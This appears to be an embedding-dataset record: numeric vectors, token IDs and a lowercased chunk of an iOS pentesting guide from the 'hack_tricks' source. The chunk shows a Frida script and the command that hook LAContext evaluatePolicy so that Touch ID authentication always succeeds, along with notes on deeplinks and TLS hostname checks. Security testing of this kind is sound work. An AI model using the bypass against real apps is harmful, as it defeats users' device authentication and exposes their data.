0.5811837315559387, -0.41632694005966187, -0.2923576533794403, 0.2630771994590759, 0.33890482783317566, 0.21906550228595734, 0.7455512285232544, -0.0699789747595787, -0.7285245060920715, -0.4471765458583832, -0.047109611332416534, -0.7878702282905579, -0.30511778593063354, -0.748995840549469, -0.14359667897224426, 0.1985451579093933, -1.029992938041687, 0.5061078667640686, -0.7208098769187927, -0.2852441370487213, 0.28426140546798706, -0.25433114171028137, 0.6591964364051819, 0.029981249943375587, -0.5806486010551453, -0.8846839666366577, 0.04394357278943062, -0.040992263704538345, 0.4604179561138153, -0.23415082693099976, -0.11448173224925995, -0.1025485247373581, 0.34503641724586487, 0.24416297674179077, -0.44527485966682434, 0.35211777687072754, 0.8180392980575562, -0.08978616446256638, 0.034281425178050995, 0.41514265537261963, 0.09370514005422592, 0.5487337112426758, -0.18561860918998718, -0.42023468017578125, 0.7323563098907471, 0.3942483961582184, -0.26359662413597107, 0.577129602432251, 0.0345679372549057, -0.7381591200828552, 0.023609494790434837, -0.17647717893123627, 0.29066628217697144, -0.4978463053703308, 0.43997299671173096, 0.17137771844863892, -0.5048639178276062, -0.37577468156814575, -0.5612339377403259, -0.50785893201828, -0.008596906438469887, -0.1491415649652481, -0.43768781423568726, -0.4601975381374359, 0.025361476466059685, 0.005799437873065472, -0.8260331749916077, 0.2550419569015503, -0.66811603307724, 0.2073671817779541, -0.7059040665626526, -0.5175318717956543, 0.5549613833427429, 0.5965033769607544, 0.24742579460144043, -0.3885558843612671, -0.2660028338432312, -0.01761937141418457, -0.037131909281015396, 0.22149351239204407, -0.9000584483146667, 0.6901149749755859, 0.23214906454086304, -0.434949666261673, 0.7640865445137024, 0.17889408767223358, -0.15917541086673737, 0.3998013138771057, -0.11806734651327133, -0.4213559329509735, -0.13635848462581635, 0.1651267260313034, 0.34813374280929565, -0.029722051694989204, 1.1077133417129517, -0.04556727781891823, -0.8546611666679382, 0.1554456502199173, 0.5775275826454163, 0.15540564060211182, 0.18953216075897217, 0.37341704964637756, 0.3310437500476837, -0.5322703123092651, -0.6125223636627197, -0.4103928506374359, 0.3730681240558624, 0.55949866771698, -0.8116822838783264, 1.0330469608306885, -0.025594891980290413, -0.3435134291648865, -0.01739533804357052, -0.4075179994106293, -0.36400750279426575, 0.797900915145874, 0.10430697351694107, 0.5331484079360962, -0.5379753112792969, 0.5682390928268433, -0.1498125046491623, -0.3503457009792328, 0.11646385490894318, 0.018130546435713768, -0.17446886003017426, -0.2278374284505844, 0.013619616627693176, -0.1717371940612793, -0.5001862645149231, 0.1933729201555252, 0.21798035502433777, 0.0381539985537529, 0.11967068165540695, -1.0502376556396484, -0.045956794172525406, 0.7423136830329895, 0.3885326385498047, 0.7681286931037903, 0.5627042651176453, 1.2125730514526367, 0.8789997696876526, -0.09617401659488678, 0.6301001310348511, -0.31928929686546326, 0.05486853048205376, -0.037064459174871445, 0.3358847498893738, -0.34275463223457336, 0.12705260515213013, -0.26529213786125183, -0.1300039440393448, -0.4654555320739746, -0.6856263279914856, 0.3953126072883606, -0.33503466844558716, -0.3357689380645752, -0.6253796815872192, -0.029557697474956512, 0.3056434690952301, -0.05401028320193291, -0.4304113984107971, 0.14711041748523712, 0.6120739579200745, 0.6588734984397888, -0.19749946892261505, 0.32058185338974, -0.3714200556278229, 0.5616230964660645, 0.15763622522354126, -0.0009884238243103027, -1.1124794483184814, -0.21527127921581268, -0.8487432599067688, -0.6225000023841858, -0.42734986543655396, 0.3511332869529724, -0.32040688395500183, -0.07773206382989883, -0.4845306873321533, 0.224355548620224, 0.4624727666378021, -0.3163156807422638, -1.1312463283538818, -0.7202847599983215, 0.35329702496528625, 0.46602919697761536, 0.8005676865577698, -0.849116325378418, 0.18048492074012756, 0.2693427801132202, -0.4680536389350891, 0.6067314147949219, -1.0231598615646362, -0.2883603870868683, 0.17024719715118408, 0.1903211623430252, -0.24338382482528687, 0.38626670837402344, -0.3574097752571106, -0.21726234257221222, -0.259854257106781, 0.3275910019874573, -0.00190646480768919, -0.6558250784873962, 0.7048189043998718, 0.1519429087638855, 0.2936517298221588, 0.42110997438430786, 0.09974335134029388, -0.15396615862846375, -0.07038680464029312, -0.2284790575504303, -1.1025584936141968, -0.02901800535619259, -0.8594154119491577, 0.39130571484565735, -0.1453804224729538, -0.1883234679698944, 0.1794515997171402, -0.20536407828330994, 0.0035847281105816364, 0.2270069718360901, 0.15834489464759827, -0.7087486386299133, -0.562209963798523, 0.18064044415950775, -0.28423216938972473, -0.44432246685028076, 0.6745606660842896, -0.007317081559449434, -0.1404186487197876, -0.019519666209816933, 0.23582197725772858, -0.9756757020950317, -0.5891927480697632, 0.06261193752288818, -0.43874111771583557, 0.03600684553384781, -0.6437615156173706, 0.30796295404434204, 0.16643643379211426, -0.4886500835418701, 0.03908079117536545, -0.5663716197013855, -0.5478875637054443, -1.4350625276565552, -0.04388079792261124, -0.1799665242433548, 0.2742997407913208, -0.313473105430603, 0.5965145826339722, -0.16911961138248444, 0.244780495762825, -0.21159453690052032, 0.18816620111465454, 0.166680708527565, 0.15014521777629852, -0.2805349826812744, 0.11493541300296783, 0.22860854864120483, -0.3452404737472534, -0.19429133832454681, 0.4105910062789917, 0.2323402315378189, -0.2849971354007721, -0.6734818816184998, -0.5849616527557373, -0.5270301699638367, -0.9275795221328735, 0.09596757590770721, 0.019334521144628525, 0.6067721247673035, -0.3125411570072174, -0.038724757730960846, -0.2821063697338104, 0.5582304000854492, 0.23450304567813873, -0.51583331823349, -0.5597742199897766, -0.30320754647254944, 0.05335839092731476, 0.04171505942940712, -0.020913245156407356, -0.2511984407901764, -0.41323819756507874, -0.08209175616502762, 0.2879837453365326, 0.9886824488639832, -0.185108944773674, 0.126573845744133, -0.6581547260284424, 0.6855812668800354, -0.42989638447761536, -0.6428128480911255, -0.8484345078468323, 0.11172455549240112, 0.05588581785559654, -0.16946889460086823, 0.7751516699790955, -0.9450188279151917, 0.2383013516664505, -0.331895112991333, 0.7836729288101196, -0.4182787537574768, -0.6675957441329956, -0.10193741321563721, -0.3005792498588562, 0.8756828308105469, -0.2353152632713318, 0.2707688808441162, 0.2161809504032135, 0.4760531783103943, 0.08897964656352997, 0.3569747805595398, -0.18316000699996948, 0.46575286984443665, -1.107049584388733, -1.1594806909561157, 0.428585022687912, -0.029153360053896904, -0.4675525724887848, -0.3445228934288025, -0.41282758116722107, 0.4580252766609192, 0.11870139837265015, 0.40623438358306885, 0.7002257108688354, -0.15287472307682037, -0.19027400016784668, -0.41340962052345276, 0.2311398684978485, -0.02375817485153675, 0.284017413854599, 0.12624089419841766, -0.3836558163166046, -0.07304131984710693, 0.582207441329956, -0.4838566780090332, 0.036146920174360275, -0.6497759819030762, 0.1813686341047287, -0.05443699657917023, -0.00003664885662146844, 0.334888756275177, -0.49796128273010254, -0.585198163986206, -0.40513765811920166, 0.11876753717660904, -0.18010476231575012, 0.2603573799133301, 1.0463850498199463, 0.5890769958496094, 0.33354854583740234, -0.3750694692134857, 0.3457891643047333, 0.29326626658439636, -0.36956217885017395, 0.8726715445518494, 0.3599332571029663, -0.692175567150116, 1.3337645530700684, 0.6872592568397522, -0.9908996224403381, -0.8443090319633484, -0.2928832173347473, -0.06535041332244873, 0.41781437397003174, -0.0633472129702568, 0.10712068527936935, 0.4015064835548401, -0.4530503749847412, 0.3083471953868866, 0.8736149072647095, 0.02964181639254093, 0.876412570476532, -0.8495684266090393, 0.8138080835342407, -0.19305388629436493, -0.32824209332466125, 0.8836676478385925, -0.7825340628623962, -0.4901941120624542, -0.41092631220817566, 0.09907849133014679, 0.5809494853019714, 0.3186846673488617, 0.8655197620391846, -0.2258966863155365, 0.32838594913482666, 0.4935552179813385, -0.11730184406042099, 0.9176962375640869, -0.06503022462129593, -0.4354991614818573, 0.664689302444458, 0.4848794639110565, -1.062714695930481, -0.7973449230194092, 0.38786643743515015, 0.17250581085681915, 0.37022194266319275, -0.5171796679496765, -0.2806473970413208, 0.45324984192848206, 0.3710782527923584, -0.18349310755729675, -0.6378315091133118, -1.009521722793579, -0.3048192858695984, 0.15184764564037323, -0.08855266869068146, 0.011303983628749847, -0.4529859721660614, 0.5184101462364197, -0.13839560747146606, -0.5514763593673706, -0.14417196810245514, 0.2220189869403839, -0.2855994999408722, -0.03324059769511223, -1.0172735452651978, -0.39303913712501526, -0.002354792784899473, -1.2075011730194092, -0.4460965096950531, -0.8606939911842346, 0.09144437313079834, -0.39284324645996094, -0.48467668890953064, 0.2542385458946228, 0.1505664885044098, 0.3505876958370209, -0.5357250571250916, -0.0366833433508873, -0.44416412711143494, -0.8430957794189453, -0.7526491284370422, 0.6531500816345215, -0.6292822957038879, -0.34451350569725037, 0.41215595602989197, 0.5123893618583679, 0.6666028499603271, -0.3152022659778595, 0.22569601237773895, 0.41648179292678833, -0.38088423013687134, 0.03770456090569496, 0.24641023576259613, -0.11441285163164139, -0.15060041844844818, -0.06931879371404648, 0.34517136216163635, -0.20848342776298523, -1.1567388772964478, -0.061473459005355835, 0.30192503333091736, -0.08595789968967438, -0.033843111246824265, 0.40720364451408386, -0.10972559452056885, 0.2751854956150055, -0.3936556279659271, 0.7957639098167419, 0.41828757524490356, -0.49515673518180847, 0.44522398710250854, 0.1290491670370102, 0.5126225352287292, -0.2768641710281372, 0.404777467250824, 0.5291388630867004, -0.7684407830238342, 0.2662588953971863, -0.24852001667022705, -0.20697662234306335, -0.5533863306045532, -0.8477374911308289, 0.25044798851013184, 1.040175437927246, 0.47450608015060425, 0.485583633184433, 0.7496160268783569, 0.14039172232151031, -0.9610252380371094, -0.22144824266433716, -1.0516713857650757, -0.4418123960494995, 0.7054848670959473, -0.16854536533355713, -0.45034363865852356, -0.7685667872428894, -0.13443347811698914, 0.09766734391450882, 0.8295087814331055, -0.04778359830379486, -0.4078318178653717, -0.10897239297628403, 0.4035041034221649, 0.9116567969322205, -0.4643809199333191, -0.05417650192975998, 0.3004380464553833, 0.7019378542900085, -0.25305256247520447, -1.3221849203109741, 0.02015436626970768, 1.1468092203140259, 0.6248540878295898, -0.3036234676837921, -0.13535305857658386, 0.17861609160900116, 0.09157054126262665, 0.3898695409297943, 0.2800815999507904, 0.7579454779624939, -0.6014049053192139, 0.08902039378881454, -0.4666925072669983, 0.7127212285995483, 0.28308457136154175, 0.30112889409065247, 0.3002006709575653, -0.46602678298950195, -0.685192883014679, -0.32422348856925964, -0.3750613033771515, -0.45168471336364746, 0.7832207083702087, 0.08996441960334778, 0.5428881645202637, -0.8560115098953247, -0.1450854390859604, -0.19606122374534607, 1.084742784500122, 0.3460833430290222, -0.2643721103668213, -0.3120145797729492, 0.32190054655075073, 0.33772480487823486, -0.6561779379844666, -0.6245636940002441, 0.9506465792655945, 0.684080183506012, 0.15011461079120636, -0.19442762434482574, -0.9201905131340027, 0.3467559814453125, -0.4408879578113556, -0.3939886689186096, -0.0823240876197815, -0.43712207674980164, 0.11669265478849411, 0.13954520225524902, -0.773193359375, 0.5251594185829163, -0.29623177647590637, 0.4932849705219269, -0.7796182036399841, -0.22990940511226654, 0.7378296852111816, 0.12391465902328491, -0.2441679686307907, 0.4674420654773712, 0.4489946663379669, -0.05567904934287071, -0.1637270748615265, 1.0404994487762451, -0.23769879341125488, -0.5900871157646179, 0.35478711128234863, 0.16587653756141663, -0.38885727524757385, 0.20336031913757324, -0.01345951110124588, -0.836781919002533, -0.2523258924484253, 0.358297199010849, 0.0034256482031196356, -0.10905598104000092, 0.12469930201768875, -0.5515127182006836, 0.5578521490097046, -0.5811456441879272, 1.2333155870437622, -0.8008526563644409, 0.21012301743030548, -0.2645282447338104, -0.42105957865715027, -0.6531652808189392, 0.8031504154205322, -0.047365155071020126, 1.2035590410232544, 0.4655763804912567, 0.780692458152771, -0.016288021579384804, 0.006925120949745178, -0.0724421963095665, -0.5805842280387878, -0.24593576788902283, -0.07408618927001953, -0.08475089818239212, -0.1419214904308319, 0.15331007540225983, 0.19999109208583832, 0.5157122015953064, -0.3690831661224365, -0.35939863324165344, -0.378304123878479, -0.33119088411331177, -0.43176886439323425, -0.6046737432479858, 0.4552439749240875, 0.011364836245775223, -0.05089182034134865, -0.1743900328874588, -0.034950900822877884, 0.19142653048038483, 0.46053898334503174, -0.10115756094455719, -0.5309428572654724, 0.03051549568772316, -0.6135276556015015, -0.25263848900794983, 0.21255914866924286, 0.37066933512687683, -0.4529142677783966, -0.21232876181602478, -0.7735576033592224, -0.17862693965435028, -0.07301374524831772, -0.7908867001533508, -0.3705613613128662, 0.47520846128463745, 0.2848309278488159, 0.6284733414649963, 0.12398459762334824, -0.367340624332428, 0.2102593034505844, 0.6132926940917969, 0.5266100764274597, -0.5491139888763428, 0.6797733902931213, 0.09198892116546631, -0.31347528100013733, 0.20768962800502777, -0.5421733260154724, 0.4564608335494995, -0.23758256435394287, 0.05504404008388519, -0.2933235466480255, -0.10807550698518753, -0.9119742512702942, 0.04169188812375069, 0.19129371643066406, -0.1862085908651352, -0.12307161092758179, -0.0419415608048439, -1.055100917816162, -0.04826117679476738, -0.7396466135978699, 0.2781541049480438, -0.10546398162841797, 0.3633020222187042, -0.03628122806549072, 0.36599332094192505, 0.5170724987983704, -1.3190786838531494, 4.315585136413574, 0.5879591107368469, 0.22168898582458496, 0.495613157749176, 0.12081264704465866, 0.5099817514419556, 0.7869293689727783, -0.5028110146522522, 0.2800898849964142, -0.26018112897872925, -0.4922519028186798, 0.2665252089500427, 0.3761717677116394, -0.27365925908088684, 0.27516740560531616, 0.6948326230049133, -0.8920239806175232, -0.2339322417974472, 0.757914125919342, -0.8192173838615417, -1.2211858034133911, 0.5123589634895325, -0.11735780537128448, 1.1568174362182617, 0.586723268032074, 0.5487361550331116, -0.41905897855758667, -0.5823933482170105, 0.038838185369968414, -0.5767117738723755, 0.19864915311336517, -0.3685052692890167, -0.19625069200992584, -0.6850550174713135, -0.4781830310821533, -0.14935941994190216, 0.626623809337616, -0.9533718824386597, -0.24461154639720917, 0.1135554164648056, 0.6428474187850952, 0.4818686842918396, 0.13806714117527008, -0.30867210030555725, -0.6654607057571411, -0.09159116446971893, -0.7603103518486023, -0.038116127252578735, 0.5538368821144104, -1.1531188488006592, 0.33388084173202515, -0.6172167658805847, 0.9509212970733643, -0.3841071128845215, -0.3600149154663086, -0.11343453079462051, -0.026532426476478577, -0.6647207140922546, 0.3365301191806793, -0.07167572528123856, 0.8901863694190979, -0.7670703530311584, 0.33678537607192993, -0.3802030086517334, -1.0377788543701172, 0.543081521987915, -0.11360696703195572, 0.2451990693807602, 0.03570299968123436, 0.1353909969329834, -0.35516393184661865, 0.25143560767173767, -0.10117393732070923, -0.6462799310684204, 0.5695890784263611, 0.35477834939956665, -0.07474298030138016, -0.07487593591213226, 0.5309884548187256, -0.9754424095153809, -0.0712428092956543, -0.15655963122844696, -0.08339842408895493, 0.378486692905426, 0.8007944822311401, 0.6092476844787598, -0.4415089786052704, -0.3513875901699066, 0.5042452216148376, 0.37101659178733826, 0.899840235710144, -0.2335367500782013, -0.32380735874176025, -0.3163094222545624, -0.16997574269771576 ]
[ 1996, 16021, 29150, 16012, 12589, 27280, 1012, 22224, 2097, 4236, 1037, 3105, 1010, 2029, 2097, 5672, 1996, 16157, 18155, 2594, 2100, 2765, 1012, 2009, 2097, 2147, 1999, 2119, 1010, 9170, 1998, 7863, 1011, 1039, 24977, 1012, 1012, 1012, 1012, 2009, 12672, 3270, 10603, 1012, 1040, 9035, 26760, 10128, 9189, 2475, 1012, 4503, 2006, 1006, 18059, 1024, 2410, 1012, 1016, 1012, 1017, 1007, 1031, 18833, 1033, 1001, 16380, 21318, 16012, 12589, 2015, 1035, 11826, 1006, 4005, 1007, 25719, 3105, 1017, 2213, 11039, 9333, 2683, 2595, 22610, 4160, 1012, 2828, 1024, 16380, 1011, 16012, 12589, 2015, 1011, 4487, 19150, 1012, 1012, 1012, 2009, 12672, 3270, 10603, 1012, 1040, 9035, 26760, 10128, 9189, 2475, 1012, 4503, 2006, 1006, 18059, 1024, 2410, 1012, 1016, 1012, 1017, 1007, 1031, 18833, 1033, 1001, 1006, 4005, 1007, 1031, 1017, 2213, 11039, 9333, 2683, 2595, 22610, 4160, 1033, 22574, 3114, 2005, 8740, 2705, 9095, 1024, 3531, 14469, 3686, 4426, 1006, 4005, 1007, 1031, 1017, 2213, 11039, 9333, 2683, 2595, 22610, 4160, 1033, 9808, 27280, 3433, 1024, 6270, 1006, 4005, 1007, 1031, 1017, 2213, 11039, 9333, 2683, 2595, 22610, 4160, 1033, 10060, 9808, 3433, 2004, 2995, 2612, 1006, 4005, 1007, 1031, 1017, 2213, 11039, 9333, 2683, 2595, 22610, 4160, 1033, 16012, 12589, 2015, 11826, 8103, 3143, 10128, 8211, 1010, 1996, 11336, 2097, 8073, 11826, 1996, 8833, 2378, 2433, 1012, 10424, 8524, 2319, 2742, 1997, 1037, 2224, 1997, 16157, 18155, 2594, 2100, 2013, 1040, 9035, 1011, 1058, 2475, 4646, 1024, 1009, 1006, 11675, 1007, 14469, 3686, 24415, 24826, 5428, 2094, 1063, 18749, 28040, 18413, 1008, 2026, 8663, 18209, 1027, 1031, 1031, 18749, 28040, 18413, 2035, 10085, 1033, 1999, 4183, 1033, 1025, 24978, 2121, 29165, 1008, 8740, 12399, 29165, 1027, 9152, 2140, 1025, 24978, 3367, 4892, 1008, 2026, 4135, 9289, 3550, 16416, 23345, 18886, 3070, 1027, 1030, 1000, 3531, 14469, 3686, 4426, 1000, 1025, 2065, 1006, 1031, 2026, 8663, 18209, 11942, 10175, 20598, 18155, 2594, 2100, 1024, 5001, 23518, 18124, 7903, 8780, 7962, 6906, 14317, 4765, 21261, 24415, 26282, 12589, 2015, 7561, 1024, 1004, 8740, 12399, 29165, 1033, 1007, 1063, 1031, 2026, 8663, 18209, 16157, 18155, 2594, 2100, 1024, 5001, 23518, 18124, 7903, 8780, 7962, 6906, 14317, 4765, 21261, 24415, 26282, 12589, 2015, 22574, 16416, 3385, 1024, 2026, 4135, 9289, 3550, 16416, 23345, 18886, 3070, 7514, 1024, 1034, 1006, 22017, 2140, 3112, 1010, 24978, 2121, 29165, 1008, 7561, 1007, 1063, 2065, 1006, 3112, 1007, 1063, 18365, 1035, 2004, 6038, 2278, 1006, 18365, 1035, 2131, 1035, 2364, 1035, 24240, 1006, 1007, 1010, 1034, 1063, 1031, 3543, 8524, 14317, 4765, 21261, 2265, 9453, 5339, 1024, 1030, 1000, 27280, 3144, 1000, 2007, 3775, 9286, 1024, 1030, 1000, 3112, 1000, 1033, 1025, 1065, 1007, 1025, 1065, 2842, 1063, 18365, 1035, 2004, 6038, 2278, 1006, 18365, 1035, 2131, 1035, 2364, 1035, 24240, 1006, 1007, 1010, 1034, 1063, 1031, 3543, 8524, 14317, 4765, 21261, 2265, 9453, 5339, 1024, 1030, 1000, 27280, 3478, 999, 1000, 2007, 3775, 9286, 1024, 1030, 1000, 7561, 1000, 1033, 1025, 1065, 1007, 1025, 1065, 1065, 1033, 1025, 1065, 2842, 1063, 18365, 1035, 2004, 6038, 2278, 1006, 18365, 1035, 2131, 1035, 2364, 1035, 24240, 1006, 1007 ]
hack_tricks
43.txt
24
, ^ { [ touchidauthentication showalert : @ " your device doesn't support touch id or you haven't configured touch id authentication on your device " withtitle : @ " error " ] ; } ) ; } } to bypass the local authentication, we have to write a frida script that bypasses the aforementioned evaluatepolicy _ check. as you can see in the above - pasted code snippet, the evaluatepolicy uses a callback that determines the result. so, the easiest way to achieve the hack is to intercept that callback and make sure it always returns the success = 1. / / from url { console. log ( " injecting... " ) ; var hook = objc. classes. lacontext [ " - evaluatepolicy : localizedreason : reply : " ] ; interceptor. attach ( hook. implementation, { onenter : function ( args ) { var block = new objc. block ( args [ 4 ] ) ; const callback = block. implementation ; block. implementation = function ( error, value ) { console. log ( " changing the result value to true " ) const result = callback ( 1, null ) ; return result ; } ; }, } ) ; } else { console. log ( " objective - c runtime is not available! " ) ; } frida - u - f com. highaltitudehacks. dviaswiftv2 - - no - pause - l fingerprint - bypass - ios. jssensitive functionality exposure through ipccustom uri handlers / deeplinks / custom schemesios custom uri handlers / deeplinks / custom schemesuniversal linksios universal linksuiactivity sharingios uiactivity sharinguipasteboardios uipasteboardapp extensionsios app extensionswebviewsios webviewsserialisation and encodingios serialisation and encodingnetwork communicationit's important to check that no communication is occurring without encryption and also that the application is correctly validating the tls certificate of the server. to check these kind of issues you can use a proxy like burp : ios burp suite configurationhostname checkone common issue validating the tls certificate is to check that the certificate was signed by a trusted ca, but not check if the hostname of the certificate is the hostname being accessed. in order to check this issue
[ 0.3425387740135193, -0.025416765362024307, -0.2821595072746277, 0.44658616185188293, -0.45089125633239746, -0.18157024681568146, -0.2528420388698578, -0.12997958064079285, 0.37499070167541504, 0.8833494782447815, 0.5962645411491394, 0.7145956754684448, 0.08565059304237366, -0.6411237716674805, -0.5864169001579285, -0.404502809047699, -0.5745894908905029, -0.19403360784053802, 0.21697750687599182, 0.23357275128364563, 0.4018371105194092, 0.03873298317193985, -0.4479878842830658, -0.06746400147676468, -0.9972748756408691, 0.22221413254737854, 0.400328665971756, 0.2139992117881775, 0.7544057369232178, 0.6270402669906616, 0.33734652400016785, -0.1005450040102005, 0.0557992048561573, -0.4562894105911255, 0.024530967697501183, 0.08274246752262115, 0.8529287576675415, -0.21703584492206573, 0.11883287131786346, -0.949508547782898, 0.07142792642116547, -0.2427445650100708, 0.03972854092717171, -0.26465344429016113, -0.8595543503761292, -0.5951501727104187, 0.03437189385294914, -0.19743113219738007, 0.13971199095249176, -0.34000247716903687, -0.1434990018606186, 0.23547542095184326, 0.0644664615392685, 0.29115986824035645, 0.18116141855716705, -0.20304857194423676, -0.5942243337631226, -0.25854164361953735, 0.035879332572221756, 0.5408928990364075, 0.3157142698764801, 0.12262246012687683, 0.2130489945411682, -1.006317377090454, 0.19180414080619812, 0.2139655351638794, 0.16992050409317017, 0.06517252326011658, -0.022867631167173386, -0.2948615849018097, -0.45375922322273254, -0.026390524581074715, -0.27399006485939026, -0.5945978760719299, -0.36665141582489014, 0.24877247214317322, 0.11139588057994843, -0.6016360521316528, -0.45694100856781006, 0.804556131362915, -0.10555870831012726, 1.0646892786026, 0.23162129521369934, 0.1088423803448677, -0.3822067975997925, -0.12221848964691162, 0.8464611768722534, 0.8334150314331055, -0.18343929946422577, 0.09562123566865921, 0.3607102036476135, 0.23512861132621765, -0.7553918361663818, -0.9792019724845886, 0.3461361527442932, 0.6685953736305237, -0.5620517134666443, -0.009068605490028858, 0.30048900842666626, -0.11554937064647675, 0.41023337841033936, 0.3224737346172333, 0.42603203654289246, 0.4143390655517578, -0.44992345571517944, 0.4562109112739563, 0.7092236280441284, -0.00036946372711099684, 0.06310322880744934, -0.5829759836196899, 0.1869482845067978, -0.002714513335376978, 0.28282129764556885, -0.7894733548164368, -0.2658824026584625, 0.2891763150691986, 0.5548951029777527, -0.16383476555347443, -0.682704746723175, 0.48218396306037903, -0.419577956199646, -0.5194821953773499, 0.4414059519767761, 0.2766557037830353, 0.9822325110435486, -0.20022515952587128, 0.6608684659004211, 0.5809240937232971, -0.3014584183692932, -0.39830833673477173, -0.07095198333263397, -0.6111116409301758, 0.1838066279888153, 0.42446982860565186, -0.7737957239151001, 0.34792181849479675, -0.1845380663871765, 0.15704378485679626, 0.6068322062492371, -1.0888960361480713, 0.11411727219820023, 0.9026077389717102, 0.5807998776435852, 1.2366526126861572, 0.7003607749938965, 0.07833139598369598, -0.092516228556633, 0.10606483370065689, -0.4708608090877533, 0.11201349645853043, -0.11479189991950989, 0.19665125012397766, 0.6509243845939636, 0.1151476502418518, -0.38663363456726074, -0.09458757936954498, -0.276395708322525, 0.09168513119220734, -0.3142921030521393, -0.6433358788490295, -0.4126802980899811, 0.6619355082511902, 0.15786591172218323, 0.3958781361579895, -0.4381255507469177, 0.1393379420042038, -0.7090015411376953, -0.49397948384284973, 0.06760862469673157, 0.10465135425329208, 0.39526277780532837, -0.15688925981521606, 0.40304678678512573, -0.27546411752700806, 0.7519556879997253, 0.3144518733024597, -0.01109565980732441, 0.062348537147045135, 0.35841643810272217, 0.26756271719932556, -0.40365296602249146, 0.4041707515716553, 0.21528875827789307, 0.7865462303161621, 0.5184099674224854, 0.03338582441210747, 0.17297828197479248, -0.681550145149231, -0.17313148081302643, -0.4164198637008667, -0.4996107518672943, 0.881116509437561, -0.8043757081031799, 0.6861340403556824, 0.822097659111023, 0.09924397617578506, -1.124766230583191, -0.42345550656318665, 0.06382917612791061, -0.8583348393440247, -0.9171543717384338, 0.6241126656532288, -0.13313502073287964, 0.9811102747917175, -0.8724358081817627, -0.37603431940078735, 0.8747930526733398, 0.5076516270637512, -0.06272696703672409, 1.1992599964141846, 0.6536758542060852, -0.16488251090049744, -0.12380920350551605, -0.2371971756219864, 0.22457048296928406, 0.0992702767252922, -0.0032863940577954054, 0.12059343606233597, 0.3746472895145416, 0.5754592418670654, 0.2998327314853668, 0.42908430099487305, 0.6980956792831421, 0.7543649673461914, -0.22048453986644745, -0.45739588141441345, 0.271197110414505, 0.21262063086032867, -0.6031200289726257, -0.20746475458145142, 0.3174285292625427, 0.8383042216300964, 0.06753293424844742, 0.39347919821739197, 0.6083373427391052, -0.1049719750881195, 0.021294591948390007, 0.21319907903671265, 0.5555148124694824, -0.1705854833126068, 0.4028046429157257, 0.9313604235649109, 0.6662228107452393, 0.9217620491981506, -0.08791208267211914, -0.06903403252363205, 0.26363053917884827, 0.18844734132289886, 0.43131348490715027, 0.07370499521493912, -0.6813933253288269, 0.6982243061065674, 0.5943029522895813, 0.17299778759479523, -0.7629120349884033, -0.10209211707115173, 0.668442964553833, 0.6350700855255127, -0.16021455824375153, -0.658088743686676, 0.32312342524528503, 0.21709738671779633, -0.6383857131004333, -0.39692604541778564, -0.048260923475027084, 0.15491583943367004, -0.13852357864379883, 0.40852347016334534, -0.4560866057872772, -0.29919254779815674, -0.6998395919799805, -0.12754933536052704, -0.9561640024185181, -0.35737553238868713, -0.7723882794380188, 0.0477638840675354, 0.3427088260650635, -0.924838662147522, 0.49354854226112366, -0.6858077645301819, -0.31483641266822815, -0.09054888039827347, 0.49502265453338623, 0.7047945857048035, 0.34381550550460815, -0.21175284683704376, -0.8034335374832153, 0.08587761223316193, 0.6918527483940125, 0.9345629215240479, 0.04573552682995796, -0.09740273654460907, -0.34234142303466797, -0.1181943491101265, 0.13855379819869995, -0.45350345969200134, 0.9157453179359436, 0.2845028042793274, -0.3757000267505646, -0.03672509640455246, 0.32899293303489685, 0.028676673769950867, 0.6061831116676331, 0.17126119136810303, -0.7718375325202942, 0.942500114440918, -0.23895053565502167, -0.22641557455062866, 0.5158357620239258, 0.24122504889965057, -0.23281356692314148, 0.5575776100158691, 0.05205560103058815, 0.4523831605911255, -0.6122130155563354, 0.6151999831199646, 0.24615709483623505, 0.21345168352127075, -0.5251273512840271, -0.5175029635429382, -0.16746975481510162, -0.18707241117954254, -0.13150064647197723, -0.3248569965362549, -0.6444112658500671, -0.37711918354034424, 0.11487139016389847, -0.9442636370658875, 0.39519524574279785, -0.9193000197410583, 0.11179827153682709, -0.15863148868083954, -0.532111406326294, 0.866218090057373, 0.48576176166534424, 0.03975481912493706, -0.30572548508644104, -0.6801326274871826, -0.13480602204799652, 0.1437455117702484, 0.4785768389701843, -0.9527131915092468, 0.5748743414878845, 0.3635580241680145, -0.07540884613990784, 0.7806320786476135, -0.11392759531736374, -0.49244424700737, -0.35311463475227356, -0.25404393672943115, -0.28878048062324524, -0.09500622004270554, -0.3541477620601654, 0.5379647016525269, -0.48528704047203064, 0.8612749576568604, -0.19449388980865479, -0.10018401592969894, 0.27131208777427673, 0.6997160315513611, 0.21723444759845734, -0.1972000002861023, 0.18677863478660583, -0.1742440164089203, -0.33895114064216614, -0.2639182209968567, 0.15918202698230743, 0.7962251901626587, 0.6514662504196167, 0.29020988941192627, 0.42616334557533264, 0.06907271593809128, -0.4126182198524475, 0.4420601427555084, -0.475114107131958, -1.2656890153884888, -0.3057788014411926, 0.5289776921272278, 0.3077980875968933, -0.040376871824264526, 0.3248476982116699, -0.26141810417175293, 0.38603925704956055, 0.5251259803771973, 0.6390083432197571, -0.5217617154121399, -0.9399721622467041, -0.6770560145378113, -0.02546052075922489, -0.3882099688053131, 0.05024130642414093, 0.012343497946858406, -0.34080538153648376, -0.3003618121147156, -0.7804152965545654, -0.5991579294204712, 0.42656150460243225, 0.6025862693786621, 0.9420643448829651, 0.17691676318645477, 0.6011475324630737, 0.8495936393737793, -0.49202969670295715, 0.5247061252593994, -0.89228755235672, 0.17761348187923431, -0.613840639591217, 0.8817299604415894, -0.806231677532196, -0.09813688695430756, 0.2498016506433487, -0.962822437286377, 0.4258107841014862, -0.817830502986908, -0.23899878561496735, -0.04243282973766327, -0.21294088661670685, -0.09357377141714096, 0.5821805596351624, 0.03231590986251831, -1.0244441032409668, -0.2879740595817566, -0.6156018972396851, 0.4803807735443115, 0.8117676973342896, -0.5333439707756042, -0.03746824339032173, -0.4652913510799408, 0.16882041096687317, 0.5436577796936035, 0.03102530539035797, -0.19282229244709015, -0.3432483673095703, -1.0798640251159668, -1.1382579803466797, 0.15868565440177917, 0.5516549944877625, -0.33465227484703064, -0.1665826439857483, -0.7636353969573975, 0.0223641749471426, 0.5004054307937622, -0.19457051157951355, -1.118147611618042, -0.4627240300178528, -0.05236797034740448, 0.48258113861083984, 0.7299163341522217, -0.6634929776191711, -0.0643649473786354, 0.09510821849107742, -0.5294615030288696, 0.48761701583862305, -0.7694679498672485, 0.32105135917663574, -0.03984427824616432, 0.27168914675712585, 0.31286123394966125, 0.6493291258811951, -1.0098025798797607, 0.024609077721834183, -0.32445797324180603, -0.28085535764694214, -0.0775192379951477, -0.20552800595760345, 0.26780351996421814, 